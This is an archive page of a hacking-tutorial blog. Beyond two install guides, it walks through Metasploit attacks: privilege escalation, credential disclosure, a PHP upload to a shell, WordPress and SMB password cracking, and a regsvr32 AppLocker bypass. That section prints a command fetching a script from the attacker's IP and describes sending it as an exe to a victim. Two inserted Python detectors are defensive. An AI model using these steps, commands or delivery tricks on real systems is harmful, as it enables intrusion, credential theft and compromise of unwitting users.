Archives

All posts for the month July, 2016

Webinspect is an automated web application security scanning tool from HP. It helps the security professionals to assess the potential vulnerabilities in the web application. It is basically a dynamic black box testing tool which detects the vulnerabilities by actually performing the attack. Today we will see how to install HP Webinspect in Windows.

We will be installing it on Windows 10. HP Webinspect requires SQL server to be installed on the system. So first install SQL server express on Windows as shown here. After SQL server is installed successfully, download the latest version of HP Webinspect from their website. We will use version 16.10 for this howto. Right click on the downloaded file and run with administrator privileges.

The installation wizard will start with the welcome message as shown below. Click on “Next”.

hpwebinspect1

Accept the license agreement and click on “Next”.

hpwebinspect2

You can change the installation folder if you want although keeping it default will not hurt. Click on “Next”.

hpwebinspect3

If you want to setup Webinspect as a sensor, select the option and click on “Next”.

hpwebinspect4

Click on “Install” to start installation process.

hpwebinspect5

Once the installation is over, it will show you the below window. If you want to start HP webinspect, select the option and click on “Finish”.

hpwebinspect6

The program will launch as shown below.

hpwebinspect7

If you get something like below, you have no SQL server installed on your system. Install SQL server express and launch the program again.

hpwebinspect8

The program will prompt you for activation as shown below. The program also offers 15 days trial. I am registering for the trial.

hpwebinspect9

hpwebinspect10

Once the registration process is over, the program will open as shown below. Update the program. In our next howto, we will see how to perform web app pentesting with HP Webinspect. Until then, Happy Weekend.

hpwebinspect12

Good morning friends. Today we will see how to install SQL server express 2012 in Windows 10.  Download the relevant SQL server 2012 express from here.  Right click on the downloaded file and run with administrator privileges. The below window should open. Click on the “New SQL server stand-alone installation” option since we are installing a new version of the database server.

sql2012e1

Accept the license terms and click on “Next”.

sql2012e2

Most probably the server will update to service pack 1. Leave it to update and after successful update, click on “Next”.

sql2012e3

Click on “Install”. The installation process will start. As it will download setup files, it will take some time.

sql2012e4

It will prompt you to select the features you want to install. If you are not sure what you want, leave the default selection and click on “Next”.

sql2012e5

The Instance configuration window opens. Leave the default options and click on “Next”.

sql2012e6

Click on “Next”.

sql2012e7

Configure the authentication for the SQL server. If you have no idea, once again leave the default options and click on “Next”.

sql2012e8

If you want to send any errors to Microsoft, select the option and click on “Next”.

sql2012e9

The installation will start as shown below.

sql2012e10

The installation progress will end with the below window. Congrats, you have successfully installed SQL server express 2012 in Windows 10.

sql2012e11

Good evening friends. Recently we have seen privilege escalation in Windows 7 with the bypass uac exploit. Today we will see another exploit, ms16-016 mrxdav.sys WEBDAV, for privilege escalation in Windows 32bit machines. mrxdav.sys is a Windows driver. It is also called Windows NT WebDav Minirdr and is used on Windows computers to utilize WebDAV servers. This exploit uses the Microsoft Web Distributed Authoring and Versioning (WebDAV) client to send specifically crafted input to a server to escalate privileges.

First hack the system with Metasploit by using one of the methods shown in Latest hacks. Once you have a meterpreter session, check the privileges by typing the command “getuid”. We don’t have system privileges. Background the session by typing the command “background” as shown below.

webdav1

Load the ms16_016_webdav exploit as shown below.

webdav2

We need only one option: session id of the session we just backgrounded. Set the session id as shown below. Run the exploit. The exploit ran successfully.

webdav3

Now verify the privileges by typing “getuid” command once again as shown below.  We successfully got system privileges.

webdav4

Hello friends. Today we will see two exploits: credential disclosure and arbitrary text file download in WebNMS Framework server 5.2. To those newbies who don’t know what WebNMS Framework Server is, it is an industry-leading framework for building network management applications and has over 25,000 deployments worldwide. Its latest version contains two vulnerabilities: credential disclosure and arbitrary text file download.

First let us see the credential disclosure exploit. Start Metasploit and load the exploit as shown below. Type command “show options” to check its options. This server runs on port 9090.

webnms1

Set the target and run the exploit. It will download the credentials and store it in a file as shown below.

webnms2

The next vulnerability is arbitrary text file download. Load the exploit and see its options. It is automatically set to download shadow file in Linux.

webnms3

Before running the exploit type command “info” to see the information about this exploit. As you can see below, it can only download text files and if it is a Windows instance the file should be in the same directory of WebNMS.

webnms4

Since we are running WebNMS framework server on a Windows machine, I have created a text file called secret.txt in the same directory. Let us try the exploit now. Set the target address and file path as shown below and run the exploit. We can see that the file has been successfully downloaded and saved in a directory.

webnms5

Hello aspiring hackers. Today we will see an exploit in Tiki Wiki CMS Groupware version <=15.1. Tiki Wiki CMS Groupware or simply Tiki, originally known as TikiWiki, is a free and open source Wiki-based content management system and online office suite.  It contains a number of collaboration features allowing it to operate as a Groupware. Groupware is an application software designed to help people involved in a common task to achieve their goals.

This exploit takes advantage of a file upload vulnerability in one of the 3rd party components, ELFinder 2.0. This component comes with default example page which demonstrates file operations such as upload, remove, rename, create directory etc. Default configuration does not force validations such as file extension, content-type etc. Thus, unauthenticated user can upload a PHP file.

Start Metasploit and load the exploit as shown below. Type command “show options” to see the options required to run this exploit.

tiki1

Set the target as shown below and check if it is vulnerable using the “check” command.

tiki2

Type command “show payloads” to see the payloads we can set to this exploit. Set the payload as I have set below.

tiki3

Check the options once again after setting the payload. They should look like below.

tiki4

Let’s run this exploit by typing command “run”. We can see that we successfully got the meterpreter shell on the target as shown below.

tiki5

Hello friends. A while ago, we saw Poison Ivy buffer overflow exploit. This exploit is just like the Poison Ivy exploit but this time we target Darkcomet RAT. ( We will learn more about Darkcomet and RAT’s later ). In this case we can just download a file from the system running Darkcomet server.

Start Metasploit and load the exploit as shown below. Type command “show options” to see the options we need.  Look at the options. Although you are familiar with the usual options, there are some new options like NEWVERSION, STORE_LOOT and TARGETFILE.

-NEWVERSION : This exploit works on all Darkcomet versions from 3.2 and above. If the version we are targeting is above 5.1, we need to set this option to “true”.

-STORE_LOOT : If you set this option to true, the file we download will be stored in loot. If the option is false, the contents of the file will be output to the console.

-TARGETFILE : The file to be downloaded from the remote system.

dcometfd1

Set the options as required. I have set store_loot option to false. If you don’t set any targetfile, by default it will download the config file of Darkcomet.

dcometfd2

Let’s see by running the exploit. We can see the contents of Darkcomet configuration file as shown below.

dcometfd3 dcometfd4

Now let’s try to download another file. For this, we need the RC4 key of Darkcomet and the password you got in the config file is useless. But there is high probability that a password has not been set. Then we can just set the DC prefix as key and run the exploit as shown below.

Here I am trying to download the hosts file but encounter an error. It’s probably Windows UAC protecting us.

dcometfd5

Now let’s create a text file in the admin folder called hello.txt with content as “hello hacker”. Now set this as target file and run the exploit. We can see that the text of the file is successfully displayed as shown below.

dcometfd6

Good morning friends. Not all vulnerabilities are unauthenticated. Sometimes we require credentials to exploit a vulnerability, like the WordPress ajax loadmore PHP upload exploit we saw in one of our previous howtos. But how do we get these credentials? Metasploit has an auxiliary module for WordPress user enumeration. Let’s see how this exploit works.

Start Metasploit and load the wordpress user enumeration exploit as shown below. Type command “show options” to see the options we can specify. We can see a variety of options. All the options are self explanatory but let us see some of the options.

The “BLANK_PASSWORDS” option, if set, will check if any of the users are without any password. The “VERBOSE” option will display more clearly what the module is doing. The “USERNAME” and “PASSWORD” options will check for a single username and password respectively. The “USER_AS_PASS” option will check whether the username itself is being used as password. The USER_FILE and PASS_FILE options are used to specify files of usernames and passwords to enumerate respectively. The VALIDATE_USERS option will first validate if a user exists on the target even before trying to crack his password.

wpuserenum1 wpuserenum2

The “USER_PASS” file option allows us to specify the same file for username and password as shown below. Here I have specified a wordlist consisting of most common passwords as the USER_PASS file. When we execute the module, we can see that it will first validate all the usernames.

wpuserenum3 wpuserenum4

What if we know the username? The first question is how we will know the username. Just go through one of our previous howtos: WordPress vulnerability assessment with WPSCAN. The tool gave us a hint that the username is “root”. Now we will set the username as root and specify a common password dictionary as the password file as shown below.

wpuserenum5

When I run the script, it confirms that the username is valid and tries all words in the dictionary as password one by one.

wpuserenum6

After some time we can see that we successfully cracked the password for user “root” as “123456”.

wpuserenum7

HOW TO STAY SAFE:

Avoid not only common passwords but also common usernames for your websites. Most people still tend to use common usernames like admin, administrator etc. and common passwords.
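On the site owner's side, a dictionary run like the one above leaves a burst of login requests in the web server's access log. The following is an added example, not part of the original howto or of Metasploit: a Python check that flags source IPs sending many failed logins in a short window. It assumes the guessing goes through POST requests to wp-login.php, where WordPress answers a failed login with 200 and a successful one with a 302 redirect; the log lines and IP addresses are constructed samples.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log line.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def parse(line):
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?")[0], int(m["status"])

def detect_login_guessing(lines, threshold=5, window=timedelta(minutes=1)):
    """Flag IPs with >= threshold failed wp-login POSTs inside one window.

    Returns {ip: {"failures": total_failed_posts, "success_after": bool}}.
    """
    failures = defaultdict(list)    # ip -> timestamps of non-302 responses
    successes = defaultdict(list)   # ip -> timestamps of 302 responses
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method != "POST" or not path.endswith("/wp-login.php"):
            continue
        (successes if status == 302 else failures)[ip].append(ts)

    flagged = {}
    for ip, stamps in failures.items():
        stamps.sort()
        start, burst_end = 0, None
        for end, ts in enumerate(stamps):          # sliding window over failures
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst_end = ts
                break
        if burst_end is not None:
            flagged[ip] = {
                "failures": len(stamps),
                # a 302 after the burst suggests a guess was accepted
                "success_after": any(s >= burst_end for s in successes[ip]),
            }
    return flagged

def _line(ip, sec, method, path, status):
    # Helper that builds one constructed log line.
    return (f'{ip} - - [14/Jul/2016:10:00:{sec:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "-"')

# Constructed sample: one noisy source, one ordinary user who mistyped once.
SAMPLE_LOG = (
    [_line("203.0.113.50", s, "POST", "/wp-login.php", 200) for s in range(6)]
    + [_line("203.0.113.50", 6, "POST", "/wp-login.php", 302),
       _line("198.51.100.7", 10, "POST", "/wp-login.php", 200),
       _line("198.51.100.7", 25, "POST", "/wp-login.php", 302),
       _line("198.51.100.7", 30, "GET", "/wp-admin/", 200)]
)

if __name__ == "__main__":
    for ip, info in detect_login_guessing(SAMPLE_LOG).items():
        print(ip, info)
```

A flagged IP with "success_after" set to True is the case to act on first: reset that account's password and review what the session did.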

WordPress is one of the most popular CMS available for websites. It can be used to create a beautiful website, blog, or app. As its developers say, “WordPress is both free and priceless at the same time”. Its latest release to date, 4.5, has been downloaded 40,446,377 times as of the editing of this howto. But being popular in the field of hacking has its own disadvantages. The latest version suffers from oEmbed Denial of Service (DoS), Password Change via Stolen Cookie and Redirect Bypass vulnerabilities.

Similarly, every version of WordPress has some vulnerability or other. But how do we find out which version of WordPress the site is running? Metasploit has an auxiliary module for WordPress version detection. Let’s see how it works.

Start Metasploit and load the module. Type command “show options” to see the options we require for this module.

wpversion1

Multiple IP addresses can be set as shown below. I am trying five targets.

wpversion2

After assigning IP addresses, type command “run” to execute the exploit. The first target is my own. As you can see, two of our targets responded with their version. But what about the others? Maybe a firewall is blocking our request or maybe our targeturi is wrong. Please try this scan with targeturi set to “/” and also “/wordpress” for better results.

wpversion3

By the way, version 4.1 suffers from an arbitrary file upload vulnerability.

NOTE: This howto is part of a series “Metasploitable tutorials”.

Good morning friends. In the previous part of the tutorial, we performed a vulnerability scan on our target Metasploitable and got some high ranking vulnerabilities. Before we take the plunge and exploit those vulnerabilities, let’s do some enumeration first.

Enumeration is the process of collecting information about user names, network resources, other machine names, shares and services running on the network. Although a little bit boring, it can be very helpful for the success of the hack in real time. In our previous parts, we have performed scanning and banner grabbing. So we already know what services are running on the target machine. They include FTP, telnet, SMTP and SMB etc. We can perform enumeration on all these services.

SMB stands for Server Message Block. It’s mainly used for providing shared access to files, printers and miscellaneous communications between nodes on a network. It also provides an authenticated inter-process communication mechanism. It is a predecessor of Common Internet File system (CIFS). To know more about SMB please go here.

SMB enumeration can provide a treasure trove of information about our target. So for today’s tutorial let’s see how to perform SMB enumeration with Kali Linux. I will use three tools inbuilt in Kali Linux : enum4linux, acccheck and SMBMap.

The first tool we will use is enum4linux. As the name suggests, it is a tool used for enumeration of Linux. To see all the options of this tool, just type “enum4linux -h“. Using this tool, first let us see the users of the SMB service. Open terminal and type command “enum4linux -U 192.168.25.129” as shown below.

enum4linux1

As we can see above, this system is part of a workgroup. Know the difference between domain and workgroup. We can see below that it has listed all the SMB users present on the target.

enum4linux2

Of all the usernames the tool got us, I am assuming only three usernames are useful to us: user, root and msfadmin, since the others seem more like processes, but we will keep our fingers crossed.

enum4linux3

Before we check for validity of these credentials, let us perform a full enumeration with enum4linux. In the terminal type command “enum4linux 192.168.25.129”, i.e. without any options. As you can see below, it lists the Nbtstat information of what services are active on the target.

enum4linux5

It also provides us with the OS information.

enum4linux6

And crucial info about Shares, i.e which user has what rights on the target.

enum4linux7

enum4linux8

It provides us password policy info, in case we don’t get the credentials and want to crack them.

enum4linux9

Groups present on the system.

enum4linux10

It will also display users based on RID cycling.

enum4linux11

It seems there are no printers connected to the target.

enum4linux12

Ok, now we know the users. Let’s try to find out the passwords for the usernames we seem to have got. We will use a tool called acccheck for this purpose. It is a password dictionary attack tool that targets windows authentication via the SMB protocol.  We will see more about password cracking later. First I will try it with the user “user”. In Kali Linux, most of the password dictionaries are present in “usr/share/dirb” directory. So I specify a dictionary which consists of most common passwords used.

Here, I am just guessing that the user may be using a common password. After specifying all the options, hit Enter. The cracking process starts as shown below.

acccheck1

Once the tool gets the correct password, it stops the scan and displays a success message as shown below. Voila … the password of the user “user” is “user” only.

acccheck2

Seeing this result, I get a new idea. There might be a possibility that all the users may be using their username as password. To find out this, I create a new file called user.txt with all the usernames we got with enum4linux and specify the file for both username and password as shown below.

acccheck4

We got success with three users: user, msfadmin and a blank user with password “games”. Since we successfully got some credentials, it’s time to see the share drives on our target system. For this, we will use another tool called SMBMap.

SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands.

First let us check the rights of each user we got as shown below.

smbmap1

smbmap2

smbmap3

We can see that users user and msfadmin have READ,WRITE permissions on tmp directory only and the Blank user doesn’t have much. Next let us try to list all the drives on the target system with user “msfadmin”. We can see we don’t have enough privileges to execute a command.

smbmap5

Since we have READ privileges, let us read the drive on the target system as shown below. Well that’s all for SMB enumeration guys.

smbmap6

RESULT: We got some usernames which may be useful to us while exploiting the system in future.

It is becoming difficult ( although not impossible ) day by day to hack Windows with no vulnerabilities like ms08_067  and of course a lot of security features enabled in Windows. But where there is a will, there is always a way.  Regsvr32 applocker bypass exploit is one such exploit. To understand how this exploit works, you need to know some things like dll and applocker.

AppLocker, introduced in Windows 7 and Windows Server 2008 R2, allows administrators to set rules to allow or deny applications from running. These rules can be used for executable files (.exe and .com), scripts (.js, .ps1, .vbs, .cmd, and .bat), Windows Installer files (.msi and .msp), and DLL files (.dll and .ocx).

Ok, now what is a dll? A dll is a dynamic link library. A dynamic link library contains code and data which can be used by multiple programs at the same time. These libraries usually have  file extensions DLL, OCX (for libraries containing ActiveX controls), or DRV (for legacy system drivers).

Ok, now let us see how this exploit works. Start Metasploit and load the exploit as shown below. Check the options we need to set. We can see that the reverse_tcp meterpreter payload is already set. We will be using this payload only.

regsvr31

Set all the required options as shown below. SRVhost and lhost are the IP address of our attacker system. After all options are set, type command “run” to run this exploit. It finishes by giving us a command as shown below. We need to run this command on our target system.

regsvr32 /s /n /u /i:http://192.168.25.147:8080/Z1115Nj.sct scrobj.dll

Now let us understand this command, discovered by researcher Casey Smith. Regsvr32 is a command line utility to register .dll files as command components in the registry. The ‘s’ option tells regsvr32 to run silently without displaying any message boxes. The ‘n’ option tells regsvr32 not to call DllRegisterServer. Since we have told regsvr32 not to call DllRegisterServer, we should specify another address. We can do this by using the “i” option, which here carries the address of the .sct file on the IP address we want ( attacker IP ).
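From the defender's side, this same command line is what appears in process-creation logs. The following is an added example, not part of the original howto or of Metasploit: a Python check that flags regsvr32 invocations carrying a remote “i” argument or scrobj.dll. The event records, host names, the vendor DLL path and the files.example.test URL are constructed samples.

```python
import re
import shlex
from pathlib import PureWindowsPath

# An /i: argument that points off-host instead of at a local file.
REMOTE = re.compile(r"^(?:https?|ftp)://|^\\\\", re.IGNORECASE)

def analyze_regsvr32(cmdline):
    """Return findings for one process command line (empty list = not flagged)."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keeps backslashes intact
    except ValueError:                              # unbalanced quotes
        tokens = cmdline.split()
    tokens = [t.strip('"') for t in tokens]
    if not tokens:
        return []
    if PureWindowsPath(tokens[0]).name.lower() not in ("regsvr32", "regsvr32.exe"):
        return []

    switches, install_arg, targets = set(), None, []
    for tok in tokens[1:]:
        if len(tok) > 1 and tok[0] in "/-":         # regsvr32 accepts / and -
            name, _, value = tok[1:].partition(":")
            switches.add(name.lower())
            if name.lower() == "i":
                install_arg = value.strip('"')
        else:
            targets.append(PureWindowsPath(tok).name.lower())

    findings = []
    if install_arg and REMOTE.search(install_arg):
        findings.append("remote /i argument: " + install_arg)
    if "scrobj.dll" in targets:
        findings.append("scrobj.dll used as the registered DLL")
    if findings and {"s", "n"} <= switches:
        findings.append("silent, DllRegisterServer skipped (/s /n)")
    return findings

# Constructed process-creation records: (host, parent image, command line).
SAMPLE_EVENTS = [
    ("WS-014", "cmd.exe",
     "regsvr32 /s /n /u /i:http://192.168.25.147:8080/Z1115Nj.sct scrobj.dll"),
    ("WS-020", "msiexec.exe",
     r'"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files\Vendor\widget.dll"'),
    ("WS-031", "explorer.exe",
     r"C:\Windows\SysWOW64\RegSvr32.EXE /S /N /U "
     r"/I:https://files.example.test/a.sct ScrObj.dll"),
    ("WS-031", "explorer.exe", r"C:\Windows\notepad.exe C:\Users\bob\todo.txt"),
]

def triage(events):
    """Return (host, parent, findings) for every event that was flagged."""
    hits = []
    for host, parent, cmdline in events:
        findings = analyze_regsvr32(cmdline)
        if findings:
            hits.append((host, parent, findings))
    return hits

if __name__ == "__main__":
    for host, parent, findings in triage(SAMPLE_EVENTS):
        print(host, parent, "; ".join(findings))
```

The ordinary silent registration of a local vendor DLL is not flagged, which keeps the check usable on hosts where installers call regsvr32 legitimately.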

You can see above that our exploit has created a link for an sct file and a dll.

regsvr32

Now it’s time for our victim to type our command on his system. Copy the command on Notepad and save it as a batch file. Convert this file to exe and send this file to the victim. I have shown one method here.

regsvr33

Now we have to start a listener as shown below.

regsvr34

Set the options exactly as we set for the exploit. So, set the port to 1111. After all the options are set, type “run” to run this exploit. If you get an error like shown below, just change the port and type “run” again. That is just a minor glitch in Metasploit.

After typing “run” the exploit will hang on as shown below.

regsvr35

When our user clicks on our file we sent him, a meterpreter session is opened as shown below.

regsvr36

This may not directly take you to a meterpreter shell and hang on as shown above. Hit on CTRL+C to interrupt the session as shown below.

regsvr37

Next type “sessions -l” to see the available meterpreter sessions. When you get the available sessions, type command “sessions -i 2” where “2” is its session id as shown below. Next, well you know what it is.

regsvr38